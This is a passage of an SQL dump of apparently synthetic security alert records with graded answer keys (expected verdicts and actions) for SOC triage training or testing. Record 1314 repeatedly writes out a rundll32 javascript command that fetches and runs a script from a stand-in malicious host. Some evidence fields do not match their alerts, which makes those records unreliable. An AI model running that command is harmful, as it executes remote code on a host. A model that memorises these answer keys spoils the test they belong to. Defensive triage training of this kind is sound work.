count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1312, 'False Positive: Internal Network Activity Mistaken as Anomalous', 'low', 'Prisma Cloud', 'Regular internal network communications were mistaken as anomalous due to increased traffic levels.', 'Network Activity', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T10:15:34Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"192.168.10.20\",\"username\":\"network_service\",\"hostname\":\"internal-server-01\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine network operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address as communication target\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The traffic is consistent with regular internal operations and does not indicate malicious activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1313, 'Potential Privilege Escalation via IAM Policy Change', 'high', 'AWS GuardDuty', 'An IAM policy was altered to grant additional privileges to a user, possibly indicating a privilege escalation attempt.', 'Privilege Escalation', 'T1098.003', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T12:05:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"198.51.100.100\",\"dst_ip\":null,\"username\":\"policy_admin\",\"hostname\":\"iam-management-console\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with unauthorized IAM changes\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"policy_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User with permissions to modify IAM policies\"}}],\"expected_actions\":[\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"privilege_escalation\",\"analysis_notes\":\"The change was made under policy_admin, an identity that is entitled to edit IAM policies, so the question is whether that credential was misused rather than whether the action was technically allowed: the request originated from an external address with a poor reputation and no change record is referenced in the alert. Pull the CloudTrail record for the change to see exactly which permissions were added and to which principal, revert the grant, rotate the policy_admin password and any access keys, and search later CloudTrail activity for use of the newly granted permissions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1314, 'APT-Level Malware Detected via Fileless Technique', 'critical', 'Recorded Future', 'A sophisticated fileless malware was detected using process hollowing and memory-only payloads, indicative of APT activity.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T14:32:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https://malicious.site/script\\\")\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https://malicious.site/script\\\")\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates fileless malware execution\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT campaign\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious IP and fileless execution technique confirms the alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1315, 'Suspicious Multi-Hop C2 Communication Detected', 'high', 'ThreatConnect', 'Detected multi-hop command and control communication through legitimate services like Slack and GitHub, indicating possible APT activity.', 'C2 Communication', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T08:27:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.65\",\"dst_ip\":\"192.168.1.15\",\"username\":\"admin\",\"hostname\":\"server02\",\"domain\":\"slack.com\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain used for obfuscation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2_communication\",\"analysis_notes\":\"Traffic involving slack.com is not evidence on its own, since most of it is legitimate and the domain verdict is clean; what makes this a true positive is the peer address, which is flagged as known C2 infrastructure, together with the connection being tied to the admin account on server02. Identify the process on server02 that owns the connection and check for a regular beacon interval, then isolate the host, block the address and review the Slack and GitHub workspaces for tokens or repositories created under that account. The event as logged lists the external address as the source, so confirm the direction against firewall or flow logs before treating it as an outbound beacon.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1316, 'Detected DGA Domain Activity Indicative of APT Campaign', 'critical', 'MISP', 'A domain generated by a Domain Generation Algorithm (DGA) was detected, commonly used by APT actors for stealthy communication.', 'DGA Activity', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T11:04:21Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"198.51.100.10\",\"username\":\"bsmith\",\"hostname\":\"desktop03\",\"domain\":\"xylznbqweu.com\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple DGA campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xylznbqweu.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain identified as part of DGA activity\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"dga_activity\",\"analysis_notes\":\"A DGA-style domain does not by itself indicate an APT, since commodity malware families use DGAs as well; the confidence here comes from the query resolving to an address already tied to DGA campaigns. Because the domain set rotates, blocking the single resolved IP is short-lived: sinkhole or block the domain at the resolver and watch for further algorithmically generated lookups from the same host, identify the process on desktop03 that issued the query, and isolate the host pending forensics.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1317, 'Detected Brute Force Attack from Suspicious IP', 'high', 'Anomali', 'A high number of failed login attempts were detected from a foreign IP address, suggesting a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.30\",\"username\":\"mjohnson\",\"hostname\":\"server04\",\"failed_attempts\":47}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 432 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjohnson\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username involved in brute force attempt\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts from a known malicious IP confirms the alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:54:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
